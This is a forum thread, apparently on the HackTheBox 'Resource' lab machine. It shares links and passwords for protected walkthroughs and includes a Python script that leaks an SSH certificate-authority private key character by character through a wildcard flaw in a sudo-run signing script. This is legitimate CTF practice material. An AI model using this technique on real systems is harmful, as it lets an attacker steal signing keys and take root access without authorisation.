Hackthebox Resource - Detailed Writeup
Link : Protected: HTB Writeup – Resource | Axura
Password: $2y$10$uW8RMBwrcANGLd31PxMfNuI8WK1gaW7Z/W8x9pkhHco2Swr2.dH16
Do not share outside, I don’t want 4xura
to get banned, because of me
Link: HackTheBox - Machine - Resource
Password: $y$j9T$qpGVMzY3EEEN7mc8vCa/r0$vyQQ/Jnzax8ldwJp6CLYh3q95Mg0kOmmJUXS4zXL.p0
Link: Resource - HackTheBox | 喵喵喵喵 | 愚かな人間
Password: $y$j9T$qpGVMzY3EEEN7mc8vCa/r0$vyQQ/Jnzax8ldwJp6CLYh3q95Mg0kOmmJUXS4zXL.p0
Link: HTB Resource — Walkthrough. This is a write up for the ‘Resource’… | by Emsar | Aug, 2024 | Medium
1 Like
The “/etc/ssh/ca-it” file crack codes in the above writeups don’t work for me.
I’ve made some changes.
This may works fine.
import subprocess
# SSH key elements
header = "-----BEGIN OPENSSH PRIVATE KEY-----"
footer = "-----END OPENSSH PRIVATE KEY-----"
ba64chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
key = []
line= 0
# Iterates over each character to test if it's the next correct one
while True:
for char in ba64chars:
# Constructs a test key with *
testKey = f"{header}\n{''.join(key)}{char}*"
with open("ca-test", "w") as f:
f.write(testKey)
proc = subprocess.run(
["sudo", "/opt/sign_key.sh", "ca-test", "xpl.pub", "root", "root_user", "1"],
capture_output=True
)
# If matched, Error code 1
if "is not a supported principal".encode('utf-8') in proc.stdout:
continue
elif proc.returncode == 1:
key.append(char)
print(char, end="", flush=True)
# Adds a newline every 70 characters
if len(key) > 1 and (len(key) - line) % 70 == 0:
key.append("\n")
line += 1
break
else:
break
# Constructs the final SSH key from the discovered characters
caKey = f"{header}\n{''.join(key)}\n{footer}"
print("The final leaked ca-it is: ", caKey)
with open("ca-it", "w") as f:
f.write(caKey)
2 Likes
Wonderful, Still i’m unsure which writeup you are referring to

I’ll pass on the message🙌